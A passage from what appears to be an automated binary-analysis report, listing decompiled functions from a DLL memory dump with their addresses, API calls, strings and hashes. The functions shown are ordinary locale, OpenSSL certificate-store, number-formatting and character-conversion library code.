				signed int _v28;
				char _v32;
				char _v48;
				char _v100;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t40;
				signed int _t44;
				signed int _t47;
				signed int _t53;
				void* _t57;
				signed int _t62;
				signed int _t63;
				void* _t64;
				signed int _t67;
				signed int _t73;
				void* _t77;
				signed int _t80;
				intOrPtr* _t83;
				signed int _t85;
				signed int _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t92;

				_t64 = __ebx;
				_push(0xffffffff);
				_push(0x6e615804);
				_push( *[fs:0x0]);
				_t88 = _t87 - 0x54;
				_t40 =  *0x6e688c24; // 0x8e9367b0
				_push(_t40 ^ _t86);
				 *[fs:0x0] =  &_v16;
				_v20 = 0;
				E6E52E4AA( &_v32, 0);
				_t80 =  *0x6e68acd0; // 0x1
				_t44 =  *0x6e68a970; // 0x14d0988
				_v8 = 0;
				_v28 = _t44;
				if(_t80 == 0) {
					E6E52E4AA( &_v24, _t80);
					_t92 =  *0x6e68acd0 - _t80; // 0x1
					if(_t92 == 0) {
						_t62 =  *0x6e68acb8; // 0x1
						_t63 = _t62 + 1;
						 *0x6e68acb8 = _t63;
						 *0x6e68acd0 = _t63;
					}
					E6E52E502( &_v24);
					_t80 =  *0x6e68acd0; // 0x1
				}
				_t67 =  *(_a4 + 4);
				if(_t80 >=  *((intOrPtr*)(_t67 + 0xc))) {
					_t83 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t83 =  *((intOrPtr*)( *((intOrPtr*)(_t67 + 8)) + _t80 * 4));
					if(_t83 != 0) {
						L24:
						E6E52E502( &_v32);
						 *[fs:0x0] = _v16;
						return _t83;
					} else {
						L8:
						if( *((char*)(_t67 + 0x14)) == 0) {
							L11:
							if(_t83 != 0) {
								goto L24;
							}
							L12:
							_t47 = _v28;
							if(_t47 == 0) {
								_t85 = E6E52F238(_t83, __eflags, 0x18);
								_t89 = _t88 + 4;
								_v28 = _t85;
								_v8 = 1;
								__eflags = _t85;
								if(_t85 == 0) {
									_t83 = 0;
									__eflags = 0;
								} else {
									_t73 =  *(_a4 + 4);
									__eflags = _t73;
									if(_t73 == 0) {
										_t53 = 0x6e682f44;
									} else {
										_t53 =  *(_t73 + 0x18);
										__eflags = _t53;
										if(_t53 == 0) {
											_t25 = _t73 + 0x1c; // 0x1d
											_t53 = _t25;
										}
									}
									E6E4F7D60(_t64,  &_v100, _t77, _t53);
									_v20 = 1;
									 *(_t85 + 4) = 0;
									 *_t85 = 0x6e6163c4;
									E6E52E8C7(_t80, _t85, __eflags,  &_v48);
									_t89 = _t89 + 4;
									asm("movups xmm0, [eax]");
									asm("movups [esi+0x8], xmm0");
								}
								__eflags = _v20 & 0x00000001;
								if(__eflags != 0) {
									E6E4F8320( &_v100);
								}
								_a4 = _t83;
								_v8 = 2;
								E6E52E680(__eflags, _t83);
								 *((intOrPtr*)( *_t83 + 4))();
								 *0x6e68a970 = _t83;
							} else {
								_t83 = _t47;
							}
							goto L24;
						}
						_t57 = E6E52E6AC();
						if(_t80 >=  *((intOrPtr*)(_t57 + 0xc))) {
							goto L12;
						}
						_t83 =  *((intOrPtr*)( *((intOrPtr*)(_t57 + 8)) + _t80 * 4));
						goto L11;
					}
				}
			}

0x6e4f7920
0x6e4f7923
0x6e4f7925
0x6e4f7930
0x6e4f7931
0x6e4f7936
0x6e4f793d
0x6e4f7941
0x6e4f794c
0x6e4f7953
0x6e4f7958
0x6e4f795e
0x6e4f7963
0x6e4f796a
0x6e4f796f
0x6e4f7975
0x6e4f797a
0x6e4f7980
0x6e4f7982
0x6e4f7987
0x6e4f7988
0x6e4f798d
0x6e4f798d
0x6e4f7995
0x6e4f799a
0x6e4f799a
0x6e4f79a3
0x6e4f79a9
0x6e4f79bb
0x6e4f79bb
0x00000000
0x6e4f79ab
0x6e4f79ae
0x6e4f79b3
0x6e4f7a7a
0x6e4f7a7d
0x6e4f7a87
0x6e4f7a94
0x6e4f79b9
0x6e4f79bd
0x6e4f79c1
0x6e4f79d3
0x6e4f79d5
0x00000000
0x00000000
0x6e4f79db
0x6e4f79db
0x6e4f79e0
0x6e4f79f0
0x6e4f79f2
0x6e4f79f5
0x6e4f79f8
0x6e4f79fc
0x6e4f79fe
0x6e4f7a4d
0x6e4f7a4d
0x6e4f7a00
0x6e4f7a03
0x6e4f7a06
0x6e4f7a08
0x6e4f7a16
0x6e4f7a0a
0x6e4f7a0a
0x6e4f7a0d
0x6e4f7a0f
0x6e4f7a11
0x6e4f7a11
0x6e4f7a11
0x6e4f7a0f
0x6e4f7a1f
0x6e4f7a27
0x6e4f7a2f
0x6e4f7a36
0x6e4f7a3c
0x6e4f7a41
0x6e4f7a44
0x6e4f7a47
0x6e4f7a47
0x6e4f7a4f
0x6e4f7a53
0x6e4f7a58
0x6e4f7a58
0x6e4f7a5d
0x6e4f7a61
0x6e4f7a65
0x6e4f7a71
0x6e4f7a74
0x6e4f79e2
0x6e4f79e2
0x6e4f79e2
0x00000000
0x6e4f79e0
0x6e4f79c3
0x6e4f79cb
0x00000000
0x00000000
0x6e4f79d0
0x00000000
0x6e4f79d0
0x6e4f79b3

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E4F7953
std::_Lockit::_Lockit.LIBCPMT ref: 6E4F7975
std::_Lockit::~_Lockit.LIBCPMT ref: 6E4F7995
__Getctype.LIBCPMT ref: 6E4F7A3C
std::_Facet_Register.LIBCPMT ref: 6E4F7A65
std::_Lockit::~_Lockit.LIBCPMT ref: 6E4F7A7D

Strings

D/hn, xrefs: 6E4F7A16

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID: D/hn
API String ID: 1102183713-17677403
Opcode ID: 87ee2dc3234de5b9ecca84cb1aee8228631f4921219efc1a88675666078cd4b8
Instruction ID: 93e67d0fedc8903351d8eac2dae352de8c8faabf6d55e7160463dcc7dad8c240
Opcode Fuzzy Hash: 87ee2dc3234de5b9ecca84cb1aee8228631f4921219efc1a88675666078cd4b8
Instruction Fuzzy Hash: 6B41F370D58615DFDB41CFA8C444F9AB7B4EF85B14F11456AE806AB3C0DB74AA02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E587200, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 62
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E6E587200(void* __ebx, void* __ecx, void* __edi, void* __ebp, void* __fp0, signed int _a12, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				char _v20;
				void* __esi;
				signed int _t10;
				void* _t12;
				void* _t23;
				void* _t24;
				intOrPtr _t28;
				intOrPtr _t31;
				void* _t33;
				void* _t35;
				signed int _t36;
				signed int _t37;
				void* _t45;

				_t45 = __fp0;
				_t35 = __ebp;
				_t24 = __ecx;
				_t23 = __ebx;
				E6E52F9A0();
				_t10 =  *0x6e688c24; // 0x8e9367b0
				_a12 = _t10 ^ _t36;
				_t31 = _a24;
				_t28 = _a20;
				if(_t31 == 0) {
					_t31 =  !=  ?  *((intOrPtr*)(_t28 + 0x14)) : "MY";
				}
				_t12 = E6E584870(_t23, _t35, _t45, _t28, "Opening certificate store %s\n", _t31);
				_t37 = _t36 + 0xc;
				__imp__CertOpenStore(9, 0, 0,  *((intOrPtr*)(_t28 + 0x1c)), _t31);
				if(_t12 == 0) {
					_t15 =  *0x6e68e398;
					_t43 = _t15;
					if(_t15 == 0) {
						 *0x6e68e398 = E6E552AE0(_t24);
					}
					E6E552F50(_t23, _t24, _t35, _t43, _t15, 0x6d, 0x71, "engines\\e_capi.c", 0x57b);
					_push(GetLastError());
					_push("%lX");
					_push(0xa);
					_push( &_v20);
					E6E55CB70(_t43);
					_push( &_v20);
					_push("Error code= 0x");
					_push(2);
					E6E5525B0();
					_t37 = _t37 + 0x30;
				}
				_pop(_t33);
				return E6E52F227(_v8 ^ _t37, _t33);
			}

0x6e587200
0x6e587200
0x6e587200
0x6e587200
0x6e587205
0x6e58720a
0x6e587211
0x6e587216
0x6e58721b
0x6e587221
0x6e58722d
0x6e58722d
0x6e587237
0x6e58723c
0x6e587249
0x6e587253
0x6e587255
0x6e58725a
0x6e58725c
0x6e587263
0x6e587263
0x6e587277
0x6e587285
0x6e587286
0x6e58728f
0x6e587291
0x6e587292
0x6e58729b
0x6e58729c
0x6e5872a1
0x6e5872a3
0x6e5872a8
0x6e5872a8
0x6e5872b2
0x6e5872bd

APIs

CertOpenStore.CRYPT32(00000009,00000000,00000000,?,?), ref: 6E587249
GetLastError.KERNEL32 ref: 6E58727F

Strings

Error code= 0x, xrefs: 6E58729C
engines\e_capi.c, xrefs: 6E58726D
Opening certificate store %s, xrefs: 6E587231
%lX, xrefs: 6E587286
tdn, xrefs: 6E587226

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: CertErrorLastOpenStore
String ID: %lX$Error code= 0x$Opening certificate store %s$engines\e_capi.c$tdn
API String ID: 942452915-1039054031
Opcode ID: a85de8d6dbd2f57edc84761fdcb8a292b573014ff5c82a7dd0257d1bef3e8a90
Instruction ID: 3a6848fa86ebf18dd9f2518fd03bff2329db037ccf52711a95281d8aaec1a3ed
Opcode Fuzzy Hash: a85de8d6dbd2f57edc84761fdcb8a292b573014ff5c82a7dd0257d1bef3e8a90
Instruction Fuzzy Hash: 0B118675B547217BE7109EE59C42F5B77E8AB96710F400815BA05EB381E760AC1487A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E55DDC0, Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 263
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E55DDC0(void* __ebx, void* __edi, void* __esi, void* __ebp, signed char _a4, intOrPtr _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, signed int _a68, intOrPtr _a76, intOrPtr _a80, signed char _a84, intOrPtr _a88, signed int _a92, signed int _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, signed int _a112) {
				intOrPtr _v0;
				intOrPtr _v4;
				signed int _t81;
				intOrPtr _t86;
				signed int _t87;
				signed int _t90;
				intOrPtr _t96;
				intOrPtr _t97;
				void* _t109;
				char _t112;
				void* _t113;
				void* _t114;
				signed int _t116;
				void* _t118;
				intOrPtr* _t120;
				void* _t121;
				void* _t122;
				signed char _t130;
				void* _t132;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t141;
				signed int _t155;
				void* _t156;
				signed int _t158;
				void* _t160;
				void* _t161;
				void* _t167;
				intOrPtr* _t168;
				void* _t171;
				void* _t174;
				void* _t175;
				void* _t176;
				intOrPtr _t183;
				signed int _t186;
				signed int _t192;
				intOrPtr _t206;

				E6E52F9A0();
				_t81 =  *0x6e688c24; // 0x8e9367b0
				_a68 = _t81 ^ _t186;
				_push(__esi);
				_a24 = _a80;
				_a4 = _a84;
				_t130 = _a112;
				_v0 = _a88;
				_t86 = _a108;
				_t154 =  >=  ? _t86 : 0;
				_t87 = _a92;
				_a36 =  >=  ? _t86 : 0;
				_t155 = _a96;
				_a32 = _a76;
				_a8 = 0;
				_a16 = _t87;
				_a12 = 0x6e682f44;
				if((_t130 & 0x00000040) == 0) {
					_t192 = _t155;
					if(_t192 > 0 || _t192 >= 0 && _t87 >= 0) {
						if((_t130 & 0x00000002) == 0) {
							_t152 =  !=  ? 0x20 : 0;
							_a8 =  !=  ? 0x20 : 0;
						} else {
							_a8 = 0x2b;
						}
					} else {
						_a8 = 0x2d;
						_a16 =  ~_t87;
						asm("adc edx, ecx");
						_t155 =  ~_t155;
					}
				}
				_t139 = _a100;
				if((_t130 & 0x00000008) != 0) {
					_t126 =  ==  ? 0x6e6278b8 : 0x6e682f44;
					_t179 =  !=  ?  ==  ? 0x6e6278b8 : 0x6e682f44 : 0x6e6164a4;
					_a12 =  !=  ?  ==  ? 0x6e6278b8 : 0x6e682f44 : 0x6e6164a4;
				}
				_t182 = _a16;
				_t89 =  ==  ? "0123456789abcdef" : "0123456789ABCDEF";
				_t167 = 0;
				_a28 =  ==  ? "0123456789abcdef" : "0123456789ABCDEF";
				while(1) {
					_t160 = _t167;
					_t90 = E6E52FBA0(_t182, _t155, _t139, 0);
					_t182 = _t90;
					_a4 = _t130;
					 *((char*)(_t186 + _t167 + 0x38)) =  *((intOrPtr*)(_t139 + _a12));
					_t167 = _t167 + 1;
					if((_t90 | _t155) == 0) {
						break;
					}
					_t139 = _a100;
					if(_t167 < 0x1a) {
						continue;
					}
					break;
				}
				_t183 = _a32;
				_t161 =  !=  ? _t167 : _t160;
				_t168 = _a12;
				if(_t161 >= 0x1a) {
					E6E52F8BD();
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					E6E52F9A0();
					asm("movsd xmm0, [0x6e625220]");
					_t96 = _v4;
					asm("movsd [esp], xmm0");
					if(_t96 != 0) {
						asm("movsd xmm1, [0x6e624208]");
						do {
							asm("mulsd xmm0, xmm1");
							_t96 = _t96 - 1;
						} while (_t96 != 0);
						asm("movsd [esp], xmm0");
					}
					return _t96;
				} else {
					_t141 = _a36;
					_t156 = _t168 + 1;
					 *((char*)(_t186 + _t161 + 0x38)) = 0;
					_t132 = _t141 - _t161;
					do {
						_t97 =  *_t168;
						_t168 = _t168 + 1;
					} while (_t97 != 0);
					_t99 =  >=  ? _t141 : _t161;
					_t143 = _a104 - ( >=  ? _t141 : _t161);
					_t206 = _a8;
					_t144 = _a104 - ( >=  ? _t141 : _t161) - (_t206 != 0);
					_t145 = _a104 - ( >=  ? _t141 : _t161) - (_t206 != 0) - _t168 - _t156;
					_t158 =  >=  ? _t132 : 0;
					_a16 = _t158;
					_t171 =  >=  ? _a104 - ( >=  ? _t141 : _t161) - (_t206 != 0) - _t168 - _t156 : 0;
					if((_a112 & 0x00000010) != 0) {
						_t124 =  >=  ? _t158 : _t171;
						_a16 =  >=  ? _t158 : _t171;
					}
					_t135 = _a24;
					_t103 =  ==  ? _t171 : 0;
					_t174 =  ==  ?  ==  ? _t171 : 0 :  ~( ==  ? _t171 : 0);
					if(_t174 <= 0) {
						L22:
						_t104 = _a8;
						if(_a8 == 0) {
							L24:
							_t106 =  *_a12;
							if( *_a12 == 0) {
								L28:
								if(_a16 <= 0) {
									L31:
									if(_t161 <= 0) {
										L35:
										if(_t174 >= 0) {
											L38:
											_pop(_t175);
											return E6E52F227(_a68 ^ _t186, _t175);
										} else {
											while(1) {
												_t109 = E6E55D530(_t183, _t135, _a4, _v0, 0x20);
												_t186 = _t186 + 0x14;
												if(_t109 == 0) {
													goto L39;
												}
												_t174 = _t174 + 1;
												if(_t174 < 0) {
													continue;
												} else {
													goto L38;
												}
												goto L46;
											}
											goto L39;
										}
									} else {
										while(1) {
											_t112 =  *((char*)(_t186 + _t161 + 0x37));
											_t161 = _t161 - 1;
											_t113 = E6E55D530(_t183, _t135, _a4, _v0, _t112);
											_t186 = _t186 + 0x14;
											if(_t113 == 0) {
												goto L39;
											}
											if(_t161 > 0) {
												continue;
											} else {
												goto L35;
											}
											goto L46;
										}
										goto L39;
									}
								} else {
									while(1) {
										_t114 = E6E55D530(_t183, _t135, _a4, _v0, 0x30);
										_t186 = _t186 + 0x14;
										if(_t114 == 0) {
											goto L39;
										}
										_t116 = _a16 - 1;
										_a16 = _t116;
										if(_t116 > 0) {
											continue;
										} else {
											goto L31;
										}
										goto L46;
									}
									goto L39;
								}
							} else {
								while(1) {
									_t118 = E6E55D530(_t183, _t135, _a4, _v0, _t106);
									_t186 = _t186 + 0x14;
									if(_t118 == 0) {
										goto L39;
									}
									_t120 = _a12 + 1;
									_a12 = _t120;
									_t106 =  *_t120;
									if( *_t120 != 0) {
										continue;
									} else {
										goto L28;
									}
									goto L46;
								}
								goto L39;
							}
						} else {
							_t121 = E6E55D530(_t183, _t135, _a4, _v0, _t104);
							_t186 = _t186 + 0x14;
							if(_t121 == 0) {
								goto L39;
							} else {
								goto L24;
							}
						}
					} else {
						while(1) {
							_t122 = E6E55D530(_t183, _t135, _a4, _v0, 0x20);
							_t186 = _t186 + 0x14;
							if(_t122 == 0) {
								break;
							}
							_t174 = _t174 - 1;
							if(_t174 > 0) {
								continue;
							} else {
								goto L22;
							}
							goto L46;
						}
						L39:
						_pop(_t176);
						return E6E52F227(_a68 ^ _t186, _t176);
					}
				}
				L46:
			}

0x6e55ddc5
0x6e55ddca
0x6e55ddd1
0x6e55ddd7
0x6e55dddf
0x6e55dde9
0x6e55ddf1
0x6e55ddf8
0x6e55ddfc
0x6e55de06
0x6e55de09
0x6e55de0d
0x6e55de11
0x6e55de15
0x6e55de19
0x6e55de1d
0x6e55de26
0x6e55de2d
0x6e55de2f
0x6e55de31
0x6e55de50
0x6e55de64
0x6e55de67
0x6e55de52
0x6e55de52
0x6e55de52
0x6e55de39
0x6e55de3b
0x6e55de43
0x6e55de47
0x6e55de49
0x6e55de49
0x6e55de31
0x6e55de6b
0x6e55de72
0x6e55de81
0x6e55de8c
0x6e55de8f
0x6e55de8f
0x6e55de93
0x6e55dea4
0x6e55dea7
0x6e55dea9
0x6e55deb0
0x6e55deb5
0x6e55deb7
0x6e55debc
0x6e55debe
0x6e55decb
0x6e55decf
0x6e55ded2
0x00000000
0x00000000
0x6e55ded4
0x6e55dedb
0x00000000
0x00000000
0x00000000
0x6e55dedb
0x6e55dedd
0x6e55dee4
0x6e55dee7
0x6e55deee
0x6e55e08f
0x6e55e094
0x6e55e095
0x6e55e096
0x6e55e097
0x6e55e098
0x6e55e099
0x6e55e09a
0x6e55e09b
0x6e55e09c
0x6e55e09d
0x6e55e09e
0x6e55e09f
0x6e55e0a5
0x6e55e0aa
0x6e55e0b2
0x6e55e0b6
0x6e55e0bd
0x6e55e0bf
0x6e55e0c7
0x6e55e0c7
0x6e55e0cb
0x6e55e0cb
0x6e55e0d0
0x6e55e0d0
0x6e55e0db
0x6e55def4
0x6e55def4
0x6e55def8
0x6e55defd
0x6e55df02
0x6e55df04
0x6e55df04
0x6e55df06
0x6e55df07
0x6e55df11
0x6e55df18
0x6e55df1c
0x6e55df25
0x6e55df27
0x6e55df2b
0x6e55df32
0x6e55df36
0x6e55df45
0x6e55df4b
0x6e55df4e
0x6e55df4e
0x6e55df56
0x6e55df5a
0x6e55df64
0x6e55df69
0x6e55df91
0x6e55df91
0x6e55df97
0x6e55dfb4
0x6e55dfb8
0x6e55dfbc
0x6e55dfed
0x6e55dff2
0x6e55e019
0x6e55e01b
0x6e55e041
0x6e55e043
0x6e55e062
0x6e55e063
0x6e55e079
0x6e55e045
0x6e55e045
0x6e55e051
0x6e55e056
0x6e55e05b
0x00000000
0x00000000
0x6e55e05d
0x6e55e060
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e55e060
0x00000000
0x6e55e045
0x6e55e020
0x6e55e020
0x6e55e020
0x6e55e025
0x6e55e031
0x6e55e036
0x6e55e03b
0x00000000
0x00000000
0x6e55e03f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e55e03f
0x00000000
0x6e55e020
0x6e55dff4
0x6e55dff4
0x6e55e000
0x6e55e005
0x6e55e00a
0x00000000
0x00000000
0x6e55e010
0x6e55e011
0x6e55e017
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e55e017
0x00000000
0x6e55dff4
0x6e55dfc0
0x6e55dfc0
0x6e55dfce
0x6e55dfd3
0x6e55dfd8
0x00000000
0x00000000
0x6e55dfe2
0x6e55dfe3
0x6e55dfe7
0x6e55dfeb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e55dfeb
0x00000000
0x6e55dfc0
0x6e55df99
0x6e55dfa4
0x6e55dfa9
0x6e55dfae
0x00000000
0x00000000
0x00000000
0x00000000
0x6e55dfae
0x6e55df70
0x6e55df70
0x6e55df7c
0x6e55df81
0x6e55df86
0x00000000
0x00000000
0x6e55df8c
0x6e55df8f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e55df8f
0x6e55e07a
0x6e55e081
0x6e55e08e
0x6e55e08e
0x6e55df69
0x00000000

APIs

__aulldvrm.LIBCMT ref: 6E55DEB7

Strings

0123456789abcdef, xrefs: 6E55DE9A
0123456789ABCDEF, xrefs: 6E55DE9F
D/hn, xrefs: 6E55DE21
D/hn, xrefs: 6E55DE7C
+, xrefs: 6E55DE52

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldvrm
String ID: +$0123456789ABCDEF$0123456789abcdef$D/hn$D/hn
API String ID: 1302938615-1899884506
Opcode ID: 16f16363c86aee0f3fa5b6932eb37eeb26e65e8b21cf67dc22c1fc5e4d92c2df
Instruction ID: 8306f1ce7f9f0b4f8d2154fc2ef00c86e3a1215eb3f7bb96c0b817a07d62f395
Opcode Fuzzy Hash: 16f16363c86aee0f3fa5b6932eb37eeb26e65e8b21cf67dc22c1fc5e4d92c2df
Instruction Fuzzy Hash: 2581A0726083119FE740CEA89880B2BBBE9AFC9748F404D2EF995D3351E735DC158B92

Uniqueness

Uniqueness Score: -1.00%

Function 6E5ACC20, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E5ACC20(void* __ebx, void* __edi, char* _a4, char* _a8) {
				signed int _v8;
				short _v24;
				char* _v28;
				int _v32;
				int _v36;
				void* _v48;
				void* __esi;
				signed int _t31;
				char _t33;
				int _t34;
				short* _t37;
				signed int _t38;
				signed int _t41;
				signed int _t44;
				intOrPtr* _t52;
				char* _t59;
				char* _t65;
				void* _t66;
				char* _t69;
				char* _t77;
				char* _t78;
				char* _t80;
				int _t86;
				void* _t88;
				void* _t90;
				void* _t91;
				void* _t92;
				signed int _t93;
				short* _t94;

				E6E52F9A0();
				_t31 =  *0x6e688c24; // 0x8e9367b0
				_v8 = _t31 ^ _t93;
				_t59 = _a8;
				_t80 = _a4;
				_t65 = _t80;
				_v28 = _t59;
				_t5 =  &(_t65[1]); // 0x6e644fcd
				_t77 = _t5;
				do {
					_t33 =  *_t65;
					_t65 =  &(_t65[1]);
				} while (_t33 != 0);
				_t66 = _t65 - _t77;
				_v36 = 8;
				_t7 = _t66 + 1; // 0x6e644fce
				_t34 = _t7;
				_v32 = _t34;
				_t86 = MultiByteToWideChar(0xfde9, 8, _t80, _t34, 0, 0);
				if(_t86 > 0) {
					L8:
					E6E530020();
					_t37 = _t94;
					_v28 = _t37;
					_t38 = MultiByteToWideChar(0xfde9, _v36, _t80, _v32, _t37, _t86);
					__eflags = _t38;
					if(_t38 == 0) {
						goto L17;
					} else {
						_t69 = _t59;
						_t78 =  &(_t69[1]);
						do {
							_t41 =  *_t69;
							_t69 =  &(_t69[1]);
							__eflags = _t41;
						} while (_t41 != 0);
						_t44 = MultiByteToWideChar(0xfde9, 0, _t59, _t69 - _t78 + 1,  &_v24, 8);
						__eflags = _t44;
						if(_t44 == 0) {
							goto L17;
						} else {
							__eflags = E6E53441D(_v28,  &_v24);
							if(__eflags != 0) {
								L16:
								_pop(_t90);
								__eflags = _v8 ^ _t93;
								return E6E52F227(_v8 ^ _t93, _t90);
							} else {
								__eflags =  *((intOrPtr*)(E6E537E6F(__eflags))) - 2;
								if(__eflags == 0) {
									L15:
									E6E534434(_t80, _t59);
									_pop(_t91);
									__eflags = _v8 ^ _t93;
									return E6E52F227(_v8 ^ _t93, _t91);
								} else {
									_t52 = E6E537E6F(__eflags);
									__eflags =  *_t52 - 9;
									if( *_t52 != 9) {
										goto L16;
									} else {
										goto L15;
									}
								}
							}
						}
					}
				} else {
					if(GetLastError() != 0x3ec) {
						L5:
						if(GetLastError() != 0x459) {
							L17:
							_pop(_t88);
							__eflags = _v8 ^ _t93;
							return E6E52F227(_v8 ^ _t93, _t88);
						} else {
							E6E534434(_t80, _v28);
							_pop(_t92);
							return E6E52F227(_v8 ^ _t93, _t92);
						}
					} else {
						_v36 = 0;
						_t86 = MultiByteToWideChar(0xfde9, 0, _t80, _v32, 0, 0);
						if(_t86 > 0) {
							_t59 = _v28;
							goto L8;
						} else {
							goto L5;
						}
					}
				}
			}

0x6e5acc28
0x6e5acc2d
0x6e5acc34
0x6e5acc38
0x6e5acc3d
0x6e5acc40
0x6e5acc42
0x6e5acc45
0x6e5acc45
0x6e5acc48
0x6e5acc48
0x6e5acc4a
0x6e5acc4b
0x6e5acc51
0x6e5acc53
0x6e5acc5c
0x6e5acc5c
0x6e5acc68
0x6e5acc71
0x6e5acc75
0x6e5accd8
0x6e5accdb
0x6e5acce0
0x6e5acced
0x6e5accf9
0x6e5accfb
0x6e5accfd
0x00000000
0x6e5acd03
0x6e5acd03
0x6e5acd05
0x6e5acd08
0x6e5acd08
0x6e5acd0a
0x6e5acd0b
0x6e5acd0b
0x6e5acd23
0x6e5acd25
0x6e5acd27
0x00000000
0x6e5acd29
0x6e5acd3a
0x6e5acd3c
0x6e5acd70
0x6e5acd76
0x6e5acd7b
0x6e5acd85
0x6e5acd3e
0x6e5acd43
0x6e5acd46
0x6e5acd52
0x6e5acd54
0x6e5acd60
0x6e5acd65
0x6e5acd6f
0x6e5acd48
0x6e5acd48
0x6e5acd4d
0x6e5acd50
0x00000000
0x00000000
0x00000000
0x00000000
0x6e5acd50
0x6e5acd46
0x6e5acd3c
0x6e5acd27
0x6e5acc77
0x6e5acc84
0x6e5acca8
0x6e5accaf
0x6e5acd86
0x6e5acd8c
0x6e5acd91
0x6e5acd9b
0x6e5accb5
0x6e5accb9
0x6e5accc5
0x6e5accd4
0x6e5accd4
0x6e5acc86
0x6e5acc8d
0x6e5acca2
0x6e5acca6
0x6e5accd5
0x00000000
0x00000000
0x00000000
0x00000000
0x6e5acca6
0x6e5acc84

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000008,6E644FCC,6E644FCE,00000000,00000000,?,<Xn,?,?,6E56D521,?), ref: 6E5ACC6B
GetLastError.KERNEL32(?,<Xn,?,?,6E56D521,?), ref: 6E5ACC7D
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6E644FCC,?,00000000,00000000,?,<Xn,?,?,6E56D521,?), ref: 6E5ACC9C
GetLastError.KERNEL32(?,<Xn,?,?,6E56D521,?), ref: 6E5ACCA8
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,6E644FCC,?,?,00000000,?,<Xn,?,?,6E56D521,?), ref: 6E5ACCF9
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,<Xn,?,?,6E56D521,?), ref: 6E5ACD23

Strings

<Xn, xrefs: 6E5ACC3B

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID: <Xn
API String ID: 1717984340-3729163905
Opcode ID: 10d221832fd7329d97b6f19ae2e4037773890468ec5591719c1888fedf89805e
Instruction ID: 67a71fde7415518c7a999195b6e67544445c6d9d4c676a9b4961a89a0361d90e
Opcode Fuzzy Hash: 10d221832fd7329d97b6f19ae2e4037773890468ec5591719c1888fedf89805e
Instruction Fuzzy Hash: D441D335E401099BDF119FE9DC51BFEBBF9EF8A214F10006ADB05BB281DB31590587A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E5322F0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6E5322F0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
